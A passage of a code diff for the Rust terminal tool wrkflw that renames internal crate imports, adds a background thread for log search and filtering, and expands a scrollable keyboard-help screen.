Some(level) => Some(level.next()),
};
// Update search matches when filter changes
self.update_log_search_matches();
// Trigger log processing update when filter changes
self.mark_logs_for_update();
}
// Clear log search and filter
@@ -676,6 +700,7 @@ impl App {
self.log_filter_level = None;
self.log_search_matches.clear();
self.log_search_match_idx = 0;
self.mark_logs_for_update();
}
// Update matches based on current search and filter
@@ -688,7 +713,7 @@ impl App {
for log in &self.logs {
all_logs.push(log.clone());
}
for log in logging::get_logs() {
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
@@ -780,12 +805,24 @@ impl App {
// Scroll logs down
pub fn scroll_logs_down(&mut self) {
// Get total log count including system logs
let total_logs = self.logs.len() + logging::get_logs().len();
let total_logs = self.logs.len() + wrkflw_logging::get_logs().len();
if total_logs > 0 {
self.log_scroll = (self.log_scroll + 1).min(total_logs - 1);
}
}
// Scroll help content up
pub fn scroll_help_up(&mut self) {
self.help_scroll = self.help_scroll.saturating_sub(1);
}
// Scroll help content down
pub fn scroll_help_down(&mut self) {
// The help content has a fixed number of lines, so we set a reasonable max
const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
}
// Update progress for running workflows
pub fn update_running_workflow_progress(&mut self) {
if let Some(idx) = self.current_execution {
@@ -834,7 +871,9 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Error: Invalid workflow selection", timestamp));
logging::error("Invalid workflow selection in trigger_selected_workflow");
wrkflw_logging::error(
"Invalid workflow selection in trigger_selected_workflow",
);
return;
}
@@ -844,7 +883,7 @@ impl App {
"[{}] Triggering workflow: {}",
timestamp, workflow.name
));
logging::info(&format!("Triggering workflow: {}", workflow.name));
wrkflw_logging::info(&format!("Triggering workflow: {}", workflow.name));
// Clone necessary values for the async task
let workflow_name = workflow.name.clone();
@@ -877,19 +916,19 @@ impl App {
// Send the result back to the main thread
if let Err(e) = tx_clone.send((selected_idx, result)) {
logging::error(&format!("Error sending trigger result: {}", e));
wrkflw_logging::error(&format!("Error sending trigger result: {}", e));
}
});
} else {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] No workflow selected to trigger", timestamp));
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
} else {
self.logs
.push("No workflow selected to trigger".to_string());
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
}
@@ -902,7 +941,7 @@ impl App {
"[{}] Debug: No workflow selected for reset",
timestamp
));
logging::warning("No workflow selected for reset");
wrkflw_logging::warning("No workflow selected for reset");
return;
}
@@ -939,7 +978,7 @@ impl App {
"[{}] Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
timestamp, workflow.name, old_status, workflow.status
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
workflow.name, old_status, workflow.status
));
@@ -949,4 +988,82 @@ impl App {
}
}
}
/// Request log processing update from background thread
pub fn request_log_processing_update(&mut self) {
let request = LogProcessingRequest {
search_query: self.log_search_query.clone(),
filter_level: self.log_filter_level.clone(),
app_logs: self.logs.clone(),
app_logs_count: self.logs.len(),
system_logs_count: wrkflw_logging::get_logs().len(),
};
if self.log_processor.request_update(request).is_err() {
// Log processor channel disconnected, recreate it
self.log_processor = LogProcessor::new();
self.logs_need_update = true;
}
}
/// Check for and apply log processing updates
pub fn check_log_processing_updates(&mut self) {
// Check if system logs have changed
let current_system_logs_count = wrkflw_logging::get_logs().len();
if current_system_logs_count != self.last_system_logs_count {
self.last_system_logs_count = current_system_logs_count;
self.mark_logs_for_update();
}
if let Some(response) = self.log_processor.try_get_update() {
self.processed_logs = response.processed_logs;
self.log_search_matches = response.search_matches;
// Update scroll position to first match if we have search results
if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
self.log_search_match_idx = 0;
if let Some(&idx) = self.log_search_matches.first() {
self.log_scroll = idx;
}
}
self.logs_need_update = false;
}
}
/// Trigger log processing when search/filter changes
pub fn mark_logs_for_update(&mut self) {
self.logs_need_update = true;
self.request_log_processing_update();
}
/// Get combined app and system logs for background processing
pub fn get_combined_logs(&self) -> Vec<String> {
let mut all_logs = Vec::new();
// Add app logs
for log in &self.logs {
all_logs.push(log.clone());
}
// Add system logs
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
all_logs
}
/// Add a log entry and trigger log processing update
pub fn add_log(&mut self, message: String) {
self.logs.push(message);
self.mark_logs_for_update();
}
/// Add a formatted log entry with timestamp and trigger log processing update
pub fn add_timestamped_log(&mut self, message: &str) {
let timestamp = Local::now().format("%H:%M:%S").to_string();
let formatted_message = format!("[{}] {}", timestamp, message);
self.add_log(formatted_message);
}
}
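The `LogProcessor` used above moves search/filter work off the UI thread: `request_update` sends a snapshot, the tick loop polls `try_get_update`. The request/response shape can be sketched with std channels (all names here are illustrative, not the crate's API):

```rust
use std::sync::mpsc;
use std::thread;

// Minimal request/response log filter running on a worker thread.
// Requests carry (search query, snapshot of logs); responses carry the matches.
fn spawn_log_filter() -> (mpsc::Sender<(String, Vec<String>)>, mpsc::Receiver<Vec<String>>) {
    let (req_tx, req_rx) = mpsc::channel::<(String, Vec<String>)>();
    let (resp_tx, resp_rx) = mpsc::channel::<Vec<String>>();
    thread::spawn(move || {
        for (query, logs) in req_rx {
            let matches: Vec<String> = logs
                .into_iter()
                .filter(|l| query.is_empty() || l.contains(&query))
                .collect();
            // Ignore send errors: the UI side may have been dropped.
            let _ = resp_tx.send(matches);
        }
    });
    (req_tx, resp_rx)
}

fn main() {
    let (tx, rx) = spawn_log_filter();
    let logs = vec![
        "[12:00:01] build ok".to_string(),
        "[12:00:02] test failed".to_string(),
    ];
    tx.send(("failed".to_string(), logs)).unwrap();
    let matches = rx.recv().unwrap();
    assert_eq!(matches, vec!["[12:00:02] test failed".to_string()]);
    println!("ok");
}
```

Recreating the worker when a send fails, as `request_log_processing_update` does above, handles the disconnected-channel case after a worker panic.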


@@ -2,12 +2,12 @@
use crate::app::App;
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
use chrono::Local;
use evaluator::evaluate_workflow_file;
use executor::{self, JobStatus, RuntimeType, StepStatus};
use std::io;
use std::path::{Path, PathBuf};
use std::sync::mpsc;
use std::thread;
use wrkflw_evaluator::evaluate_workflow_file;
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};
// Validate a workflow or directory containing workflows
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
@@ -20,7 +20,7 @@ pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
let entry = entry?;
let entry_path = entry.path();
if entry_path.is_file() && utils::is_workflow_file(&entry_path) {
if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
workflows.push(entry_path);
}
}
@@ -105,23 +105,24 @@ pub async fn execute_workflow_cli(
// Check container runtime availability if container runtime is selected
let runtime_type = match runtime_type {
RuntimeType::Docker => {
if !executor::docker::is_available() {
if !wrkflw_executor::docker::is_available() {
println!("⚠️ Docker is not available. Using emulation mode instead.");
logging::warning("Docker is not available. Using emulation mode instead.");
wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
RuntimeType::Emulation
} else {
RuntimeType::Docker
}
}
RuntimeType::Podman => {
if !executor::podman::is_available() {
if !wrkflw_executor::podman::is_available() {
println!("⚠️ Podman is not available. Using emulation mode instead.");
logging::warning("Podman is not available. Using emulation mode instead.");
wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
RuntimeType::Emulation
} else {
RuntimeType::Podman
}
}
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
RuntimeType::Emulation => RuntimeType::Emulation,
};
@@ -129,20 +130,20 @@ pub async fn execute_workflow_cli(
println!("Runtime mode: {:?}", runtime_type);
// Log the start of the execution in debug mode with more details
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Starting workflow execution: path={}, runtime={:?}, verbose={}",
path.display(),
runtime_type,
verbose
));
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type,
verbose,
preserve_containers_on_failure: false, // Default for this path
};
match executor::execute_workflow(path, config).await {
match wrkflw_executor::execute_workflow(path, config).await {
Ok(result) => {
println!("\nWorkflow execution results:");
@@ -166,7 +167,7 @@ pub async fn execute_workflow_cli(
println!("-------------------------");
// Log the job details for debug purposes
logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
for step in job.steps.iter() {
match step.status {
@@ -202,7 +203,7 @@ pub async fn execute_workflow_cli(
}
// Show command/run details in debug mode
if logging::get_log_level() <= logging::LogLevel::Debug {
if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
if let Some(cmd_output) = step
.output
.lines()
@@ -242,7 +243,7 @@ pub async fn execute_workflow_cli(
}
// Always log the step details for debug purposes
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Step: {}, Status: {:?}, Output length: {} lines",
step.name,
step.status,
@@ -250,10 +251,10 @@ pub async fn execute_workflow_cli(
));
// In debug mode, log all step output
if logging::get_log_level() == logging::LogLevel::Debug
if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
&& !step.output.trim().is_empty()
{
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Step output for '{}': \n{}",
step.name, step.output
));
@@ -265,7 +266,7 @@ pub async fn execute_workflow_cli(
println!("\n❌ Workflow completed with failures");
// In the case of failure, we'll also inform the user about the debug option
// if they're not already using it
if logging::get_log_level() > logging::LogLevel::Debug {
if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
println!(" Run with --debug for more detailed output");
}
} else {
@@ -276,7 +277,7 @@ pub async fn execute_workflow_cli(
}
Err(e) => {
println!("❌ Failed to execute workflow: {}", e);
logging::error(&format!("Failed to execute workflow: {}", e));
wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
Err(io::Error::other(e))
}
}
@@ -286,7 +287,7 @@ pub async fn execute_workflow_cli(
pub async fn execute_curl_trigger(
workflow_name: &str,
branch: Option<&str>,
) -> Result<(Vec<executor::JobResult>, ()), String> {
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
// Get GitHub token
let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
"GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
@@ -294,13 +295,13 @@ pub async fn execute_curl_trigger(
// Debug log to check if GITHUB_TOKEN is set
match std::env::var("GITHUB_TOKEN") {
Ok(token) => logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
Err(_) => logging::error("GITHUB_TOKEN is not set"),
Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
}
// Get repository information
let repo_info =
github::get_repo_info().map_err(|e| format!("Failed to get repository info: {}", e))?;
let repo_info = wrkflw_github::get_repo_info()
.map_err(|e| format!("Failed to get repository info: {}", e))?;
// Determine branch to use
let branch_ref = branch.unwrap_or(&repo_info.default_branch);
@@ -315,7 +316,7 @@ pub async fn execute_curl_trigger(
workflow_name
};
logging::info(&format!("Using workflow name: {}", workflow_name));
wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));
// Construct JSON payload
let payload = serde_json::json!({
@@ -328,7 +329,7 @@ pub async fn execute_curl_trigger(
repo_info.owner, repo_info.repo, workflow_name
);
logging::info(&format!("Triggering workflow at URL: {}", url));
wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));
// Create a reqwest client
let client = reqwest::Client::new();
@@ -362,12 +363,12 @@ pub async fn execute_curl_trigger(
);
// Create a job result structure
let job_result = executor::JobResult {
let job_result = wrkflw_executor::JobResult {
name: "GitHub Trigger".to_string(),
status: executor::JobStatus::Success,
steps: vec![executor::StepResult {
status: wrkflw_executor::JobStatus::Success,
steps: vec![wrkflw_executor::StepResult {
name: "Remote Trigger".to_string(),
status: executor::StepStatus::Success,
status: wrkflw_executor::StepStatus::Success,
output: success_msg,
}],
logs: "Workflow triggered remotely on GitHub".to_string(),
@@ -391,13 +392,13 @@ pub fn start_next_workflow_execution(
if verbose {
app.logs
.push("Verbose mode: Step outputs will be displayed in full".to_string());
logging::info("Verbose mode: Step outputs will be displayed in full");
wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
} else {
app.logs.push(
"Standard mode: Only step status will be shown (use --verbose for full output)"
.to_string(),
);
logging::info(
wrkflw_logging::info(
"Standard mode: Only step status will be shown (use --verbose for full output)",
);
}
@@ -406,21 +407,24 @@ pub fn start_next_workflow_execution(
let runtime_type = match app.runtime_type {
RuntimeType::Docker => {
// Use safe FD redirection to check Docker availability
let is_docker_available =
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
if !is_docker_available {
app.logs
.push("Docker is not available. Using emulation mode instead.".to_string());
logging::warning("Docker is not available. Using emulation mode instead.");
wrkflw_logging::warning(
"Docker is not available. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
RuntimeType::Docker
@@ -428,26 +432,30 @@ pub fn start_next_workflow_execution(
}
RuntimeType::Podman => {
// Use safe FD redirection to check Podman availability
let is_podman_available =
match utils::fd::with_stderr_to_null(executor::podman::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability.",
);
false
}
};
if !is_podman_available {
app.logs
.push("Podman is not available. Using emulation mode instead.".to_string());
logging::warning("Podman is not available. Using emulation mode instead.");
wrkflw_logging::warning(
"Podman is not available. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
RuntimeType::Podman
}
}
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
RuntimeType::Emulation => RuntimeType::Emulation,
};
@@ -487,21 +495,21 @@ pub fn start_next_workflow_execution(
Ok(validation_result) => {
// Create execution result based on validation
let status = if validation_result.is_valid {
executor::JobStatus::Success
wrkflw_executor::JobStatus::Success
} else {
executor::JobStatus::Failure
wrkflw_executor::JobStatus::Failure
};
// Create a synthetic job result for validation
let jobs = vec![executor::JobResult {
let jobs = vec![wrkflw_executor::JobResult {
name: "Validation".to_string(),
status,
steps: vec![executor::StepResult {
steps: vec![wrkflw_executor::StepResult {
name: "Validator".to_string(),
status: if validation_result.is_valid {
executor::StepStatus::Success
wrkflw_executor::StepStatus::Success
} else {
executor::StepStatus::Failure
wrkflw_executor::StepStatus::Failure
},
output: validation_result.issues.join("\n"),
}],
@@ -521,15 +529,15 @@ pub fn start_next_workflow_execution(
}
} else {
// Use safe FD redirection for execution
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type,
verbose,
preserve_containers_on_failure,
};
let execution_result = utils::fd::with_stderr_to_null(|| {
let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
futures::executor::block_on(async {
executor::execute_workflow(&workflow_path, config).await
wrkflw_executor::execute_workflow(&workflow_path, config).await
})
})
.map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
@@ -546,7 +554,7 @@ pub fn start_next_workflow_execution(
// Only send if we get a valid result
if let Err(e) = tx_clone_inner.send((next_idx, result)) {
logging::error(&format!("Error sending execution result: {}", e));
wrkflw_logging::error(&format!("Error sending execution result: {}", e));
}
});
} else {
@@ -554,6 +562,6 @@ pub fn start_next_workflow_execution(
let timestamp = Local::now().format("%H:%M:%S").to_string();
app.logs
.push(format!("[{}] All workflows completed execution", timestamp));
logging::info("All workflows completed execution");
wrkflw_logging::info("All workflows completed execution");
}
}

View File

@@ -12,6 +12,7 @@
pub mod app;
pub mod components;
pub mod handlers;
pub mod log_processor;
pub mod models;
pub mod utils;
pub mod views;

View File

@@ -0,0 +1,305 @@
// Background log processor for asynchronous log filtering and formatting
use crate::models::LogFilterLevel;
use ratatui::{
style::{Color, Style},
text::{Line, Span},
widgets::{Cell, Row},
};
use std::sync::mpsc;
use std::thread;
use std::time::{Duration, Instant};
/// Processed log entry ready for rendering
#[derive(Debug, Clone)]
pub struct ProcessedLogEntry {
pub timestamp: String,
pub log_type: String,
pub log_style: Style,
pub content_spans: Vec<Span<'static>>,
}
impl ProcessedLogEntry {
/// Convert to a table row for rendering
pub fn to_row(&self) -> Row<'static> {
Row::new(vec![
Cell::from(self.timestamp.clone()),
Cell::from(self.log_type.clone()).style(self.log_style),
Cell::from(Line::from(self.content_spans.clone())),
])
}
}
/// Request to update log processing parameters
#[derive(Debug, Clone)]
pub struct LogProcessingRequest {
pub search_query: String,
pub filter_level: Option<LogFilterLevel>,
pub app_logs: Vec<String>, // Complete app logs
pub app_logs_count: usize, // To detect changes in app logs
pub system_logs_count: usize, // To detect changes in system logs
}
/// Response with processed logs
#[derive(Debug, Clone)]
pub struct LogProcessingResponse {
pub processed_logs: Vec<ProcessedLogEntry>,
pub total_log_count: usize,
pub filtered_count: usize,
pub search_matches: Vec<usize>, // Indices of logs that match search
}
/// Background log processor
pub struct LogProcessor {
request_tx: mpsc::Sender<LogProcessingRequest>,
response_rx: mpsc::Receiver<LogProcessingResponse>,
_worker_handle: thread::JoinHandle<()>,
}
impl LogProcessor {
/// Create a new log processor with a background worker thread
pub fn new() -> Self {
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
let worker_handle = thread::spawn(move || {
Self::worker_loop(request_rx, response_tx);
});
Self {
request_tx,
response_rx,
_worker_handle: worker_handle,
}
}
/// Send a processing request (non-blocking)
pub fn request_update(
&self,
request: LogProcessingRequest,
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
self.request_tx.send(request)
}
/// Try to get the latest processed logs (non-blocking)
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
self.response_rx.try_recv().ok()
}
/// Background worker loop
fn worker_loop(
request_rx: mpsc::Receiver<LogProcessingRequest>,
response_tx: mpsc::Sender<LogProcessingResponse>,
) {
let mut last_request: Option<LogProcessingRequest> = None;
let mut last_processed_time = Instant::now();
let mut cached_logs: Vec<String> = Vec::new();
let mut cached_app_logs_count = 0;
let mut cached_system_logs_count = 0;
loop {
// Check for new requests with a timeout to allow periodic processing
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
Ok(req) => Some(req),
Err(mpsc::RecvTimeoutError::Timeout) => None,
Err(mpsc::RecvTimeoutError::Disconnected) => break,
};
// Update request if we received one
if let Some(req) = request {
last_request = Some(req);
}
// Process if we have a request and enough time has passed since last processing
if let Some(ref req) = last_request {
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
&& (cached_app_logs_count != req.app_logs_count
|| cached_system_logs_count != req.system_logs_count
|| cached_logs.is_empty());
if should_process {
// Refresh log cache if log counts changed
if cached_app_logs_count != req.app_logs_count
|| cached_system_logs_count != req.system_logs_count
|| cached_logs.is_empty()
{
cached_logs = Self::get_combined_logs(&req.app_logs);
cached_app_logs_count = req.app_logs_count;
cached_system_logs_count = req.system_logs_count;
}
let response = Self::process_logs(&cached_logs, req);
if response_tx.send(response).is_err() {
break; // Receiver disconnected
}
last_processed_time = Instant::now();
}
}
}
}
/// Get combined app and system logs
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
let mut all_logs = Vec::new();
// Add app logs
for log in app_logs {
all_logs.push(log.clone());
}
// Add system logs
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
all_logs
}
/// Process logs according to search and filter criteria
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
// Filter logs based on search query and filter level
let mut filtered_logs = Vec::new();
let mut search_matches = Vec::new();
for (idx, log) in all_logs.iter().enumerate() {
let passes_filter = match &request.filter_level {
None => true,
Some(level) => level.matches(log),
};
let matches_search = if request.search_query.is_empty() {
true
} else {
log.to_lowercase()
.contains(&request.search_query.to_lowercase())
};
if passes_filter && matches_search {
filtered_logs.push((idx, log));
if matches_search && !request.search_query.is_empty() {
search_matches.push(filtered_logs.len() - 1);
}
}
}
// Process filtered logs into display format
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
.iter()
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
.collect();
LogProcessingResponse {
processed_logs,
total_log_count: all_logs.len(),
filtered_count: filtered_logs.len(),
search_matches,
}
}
/// Process a single log entry into display format
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
// Extract timestamp from log format [HH:MM:SS]
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
let end = log_line.find(']').unwrap_or(0);
if end > 1 {
log_line[1..end].to_string()
} else {
"??:??:??".to_string()
}
} else {
"??:??:??".to_string()
};
// Determine log type and style
let (log_type, log_style) =
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("")
{
("ERROR", Style::default().fg(Color::Red))
} else if log_line.contains("Warning")
|| log_line.contains("warning")
|| log_line.contains("⚠️")
{
("WARN", Style::default().fg(Color::Yellow))
} else if log_line.contains("Success")
|| log_line.contains("success")
|| log_line.contains("")
{
("SUCCESS", Style::default().fg(Color::Green))
} else if log_line.contains("Running")
|| log_line.contains("running")
|| log_line.contains("")
{
("INFO", Style::default().fg(Color::Cyan))
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
("TRIG", Style::default().fg(Color::Magenta))
} else {
("INFO", Style::default().fg(Color::Gray))
};
// Extract content after timestamp
let content = if log_line.starts_with('[') && log_line.contains(']') {
let start = log_line.find(']').unwrap_or(0) + 1;
log_line[start..].trim()
} else {
log_line
};
// Create content spans with search highlighting
let content_spans = if !search_query.is_empty() {
Self::highlight_search_matches(content, search_query)
} else {
vec![Span::raw(content.to_string())]
};
ProcessedLogEntry {
timestamp,
log_type: log_type.to_string(),
log_style,
content_spans,
}
}
/// Highlight search matches in content
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
let mut spans = Vec::new();
let lowercase_content = content.to_lowercase();
let lowercase_query = search_query.to_lowercase();
if lowercase_content.contains(&lowercase_query) {
let mut last_idx = 0;
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
let real_idx = last_idx + idx;
// Add text before match
if real_idx > last_idx {
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
}
// Add matched text with highlight
let match_end = real_idx + search_query.len();
spans.push(Span::styled(
content[real_idx..match_end].to_string(),
Style::default().bg(Color::Yellow).fg(Color::Black),
));
last_idx = match_end;
}
// Add remaining text after last match
if last_idx < content.len() {
spans.push(Span::raw(content[last_idx..].to_string()));
}
} else {
spans.push(Span::raw(content.to_string()));
}
spans
}
}
impl Default for LogProcessor {
fn default() -> Self {
Self::new()
}
}

View File

@@ -1,10 +1,10 @@
// UI Models for wrkflw
use chrono::Local;
use executor::{JobStatus, StepStatus};
use std::path::PathBuf;
use wrkflw_executor::{JobStatus, StepStatus};
/// Type alias for the complex execution result type
pub type ExecutionResultMsg = (usize, Result<(Vec<executor::JobResult>, ()), String>);
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);
/// Represents an individual workflow file
pub struct Workflow {
@@ -50,6 +50,7 @@ pub struct StepExecution {
}
/// Log filter levels
#[derive(Debug, Clone, PartialEq)]
pub enum LogFilterLevel {
Info,
Warning,

View File

@@ -1,7 +1,7 @@
// UI utilities
use crate::models::{Workflow, WorkflowStatus};
use std::path::{Path, PathBuf};
use utils::is_workflow_file;
use wrkflw_utils::is_workflow_file;
/// Find and load all workflow files in a directory
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {

View File

@@ -145,15 +145,17 @@ pub fn render_execution_tab(
.iter()
.map(|job| {
let status_symbol = match job.status {
executor::JobStatus::Success => "",
executor::JobStatus::Failure => "",
executor::JobStatus::Skipped => "",
wrkflw_executor::JobStatus::Success => "",
wrkflw_executor::JobStatus::Failure => "",
wrkflw_executor::JobStatus::Skipped => "",
};
let status_style = match job.status {
executor::JobStatus::Success => Style::default().fg(Color::Green),
executor::JobStatus::Failure => Style::default().fg(Color::Red),
executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
wrkflw_executor::JobStatus::Success => {
Style::default().fg(Color::Green)
}
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
};
// Count completed and total steps
@@ -162,8 +164,8 @@ pub fn render_execution_tab(
.steps
.iter()
.filter(|s| {
s.status == executor::StepStatus::Success
|| s.status == executor::StepStatus::Failure
s.status == wrkflw_executor::StepStatus::Success
|| s.status == wrkflw_executor::StepStatus::Failure
})
.count();

View File

@@ -1,7 +1,7 @@
// Help overlay rendering
use ratatui::{
backend::CrosstermBackend,
layout::Rect,
layout::{Constraint, Direction, Layout, Rect},
style::{Color, Modifier, Style},
text::{Line, Span},
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
@@ -9,11 +9,22 @@ use ratatui::{
};
use std::io;
// Render the help tab
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
let help_text = vec![
// Render the help tab with scroll support
pub fn render_help_content(
f: &mut Frame<CrosstermBackend<io::Stdout>>,
area: Rect,
scroll_offset: usize,
) {
// Split the area into columns for better organization
let chunks = Layout::default()
.direction(Direction::Horizontal)
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
.split(area);
// Left column content
let left_help_text = vec![
Line::from(Span::styled(
"Keyboard Controls",
"🗂 NAVIGATION",
Style::default()
.fg(Color::Cyan)
.add_modifier(Modifier::BOLD),
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
Line::from(""),
Line::from(vec![
Span::styled(
"Tab",
"Tab / Shift+Tab",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Switch between tabs"),
]),
// More help text would follow...
Line::from(vec![
Span::styled(
"1-4 / w,x,l,h",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Jump to specific tab"),
]),
Line::from(vec![
Span::styled(
"↑/↓ or k/j",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Navigate lists"),
]),
Line::from(vec![
Span::styled(
"Enter",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Select/View details"),
]),
Line::from(vec![
Span::styled(
"Esc",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Back/Exit help"),
]),
Line::from(""),
Line::from(Span::styled(
"🚀 WORKFLOW MANAGEMENT",
Style::default()
.fg(Color::Green)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"Space",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle workflow selection"),
]),
Line::from(vec![
Span::styled(
"r",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Run selected workflows"),
]),
Line::from(vec![
Span::styled(
"a",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Select all workflows"),
]),
Line::from(vec![
Span::styled(
"n",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Deselect all workflows"),
]),
Line::from(vec![
Span::styled(
"Shift+R",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Reset workflow status"),
]),
Line::from(vec![
Span::styled(
"t",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Trigger remote workflow"),
]),
Line::from(""),
Line::from(Span::styled(
"🔧 EXECUTION MODES",
Style::default()
.fg(Color::Magenta)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"e",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle emulation mode"),
]),
Line::from(vec![
Span::styled(
"v",
Style::default()
.fg(Color::Yellow)
.add_modifier(Modifier::BOLD),
),
Span::raw(" - Toggle validation mode"),
]),
Line::from(""),
Line::from(vec![Span::styled(
"Runtime Modes:",
Style::default()
.fg(Color::White)
.add_modifier(Modifier::BOLD),
)]),
Line::from(vec![
Span::raw(""),
Span::styled("Docker", Style::default().fg(Color::Blue)),
Span::raw(" - Container isolation (default)"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Podman", Style::default().fg(Color::Blue)),
Span::raw(" - Rootless containers"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Emulation", Style::default().fg(Color::Red)),
Span::raw(" - Process mode (UNSAFE)"),
]),
Line::from(vec![
Span::raw(""),
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
Span::raw(" - Sandboxed processes"),
]),
];
let help_widget = Paragraph::new(help_text)
// Right column content
let right_help_text = vec![
Line::from(Span::styled(
"📄 LOGS & SEARCH",
Style::default()
.fg(Color::Blue)
.add_modifier(Modifier::BOLD),
)),
Line::from(""),
Line::from(vec![
Span::styled(
"s",
Style::default()
